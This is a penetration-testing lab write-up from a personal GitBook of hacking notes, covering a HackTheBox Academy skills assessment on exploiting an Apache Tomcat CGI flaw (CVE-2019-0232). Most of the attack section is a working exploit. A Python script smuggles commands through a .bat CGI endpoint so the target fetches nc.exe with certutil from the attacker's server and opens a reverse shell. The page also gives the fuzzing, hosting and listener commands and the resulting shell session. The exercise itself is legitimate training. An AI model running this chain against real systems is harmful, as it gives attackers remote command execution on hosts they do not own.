Hack-notes
  • Whoami
  • MalDev
    • Reflective loader
  • Academy HackTheBox
    • Attacking Common Applications
      • Attacking Common Applications - Skills Assessment I
      • Attacking Common Applications - Skills Assessment II
      • Attacking Common Applications - Skills Assessment III
    • Attacking Common Services
      • Attacking Common Services - Easy
      • Attacking Common Services - Medium
      • Attacking Common Services - Hard
    • AD Enumeration & Attacks - Skills Assessment Part I
    • AD Enumeration & Attacks - Skills Assessment Part II
  • HackTheBox-writeups
    • Machines
      • Windows
        • Jab
      • Linux
        • ICLEAN
  • CheatSheet
    • AD
      • linux
      • Windows
      • Bloodhound cypher query
      • Powerview
    • Privilege Escalation
      • Linux
      • Windows
    • Payloads (Reverse shell)
    • Post-Exploitation
      • Windows
    • CLM and Applocker Bypass
  • Your Path to the OSCP+
  • Pwning OSEP with `secrets.txt` on my first attempt
Powered by GitBook
On this page

Was this helpful?

  1. Academy HackTheBox
  2. Attacking Common Applications

Attacking Common Applications - Skills Assessment I

During a penetration test against the company Inlanefreight, you have performed extensive enumeration and found the network to be quite locked down and well-hardened. You come across one host of particular interest that may be your ticket to an initial foothold. Enumerate the target host for potentially vulnerable applications, obtain a foothold, and submit the contents of the flag.txt file to complete this portion of the skills assessment.

POC

so first i started nmap scan

# Nmap 7.94SVN scan initiated Tue Jun  4 14:50:30 2024 as: nmap -A -oN enum.txt 10.129.201.89
Nmap scan report for 10.129.201.89 (10.129.201.89)
Host is up (1.2s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE       VERSION
21/tcp   open     ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_09-01-21  08:07AM       <DIR>          website_backup
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open     http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Freight Logistics, Inc
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open     microsoft-ds?
1096/tcp filtered cnrprotocol
3389/tcp open     ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-04T18:59:33+00:00; +19s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: APPS-SKILLS1
|   NetBIOS_Domain_Name: APPS-SKILLS1
|   NetBIOS_Computer_Name: APPS-SKILLS1
|   DNS_Domain_Name: APPS-SKILLS1
|   DNS_Computer_Name: APPS-SKILLS1
|   Product_Version: 10.0.17763
|_  System_Time: 2024-06-04T18:59:23+00:00
| ssl-cert: Subject: commonName=APPS-SKILLS1
| Not valid before: 2024-06-03T18:50:10
|_Not valid after:  2024-12-03T18:50:10
8000/tcp open     http          Jetty 9.4.42.v20210604
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.42.v20210604)
| http-robots.txt: 1 disallowed entry 
|_/
8009/tcp open     ajp13         Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open     http          Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/9.0.0.M1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-06-04T18:59:26
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 19s, deviation: 0s, median: 19s

After googling, we determined that Tomcat version 9.0.0.M1 is vulnerable to command execution so i cloned this exploit from GitHub and this is the script

#!/usr/bin/env python3
import time
import requests
host='10.129.201.89'#add host to connect
port='8080'#add port of host {default:8080}
server_ip='10.10.16.65'#server that has nc.exe file to get reverse shell
server_port='80'
nc_ip='10.10.16.65'
nc_port='1234'
url1 = host + ":" + str(port) + "/cgi/cmd.bat?" + "&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F" + server_ip + ":" + server_port + "%2Fnc%2Eexe+nc.exe"
url2 = host + ":" + str(port) + "/cgi/cmd.bat?&nc.exe+" + server_ip + "+" + nc_port + "+-e+cmd.exe"
try:
    requests.get("http://" + url1)
    time.sleep(2)
    requests.get("http://" + url2)
    print(url2)
except:
    print("Some error occured in the script")

As you can see everything is clear in this PoC. We need to determine the CGI endpoint and for that i used ffuf

ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.129.205.30:8080/cgi/FUZZ.bat

And then we need to open three terminals:

  • In the first terminal, we need to start a Python server where nc.exe is placed to be downloaded by the target machine using the certutil command.

  • In the second terminal, we need to start a listener using nc and the same port we use in the script.

  • In the last terminal, we will start our PoC.

sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.201.89 - - [04/Jun/2024 16:40:06] "GET /nc.exe HTTP/1.1" 200 -
10.129.201.89 - - [04/Jun/2024 16:40:07] "GET /nc.exe HTTP/1.1" 200 -

starting listener using nc

nc -lnvp 1234

starting the poc

python3 CVE-2019-0232.py

getting shell

listening on [any] 1234 ...
connect to [10.10.16.65] from (UNKNOWN) [10.129.201.89] 49701
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi
PreviousAttacking Common ApplicationsNextAttacking Common Applications - Skills Assessment II

Last updated 1 year ago

Was this helpful?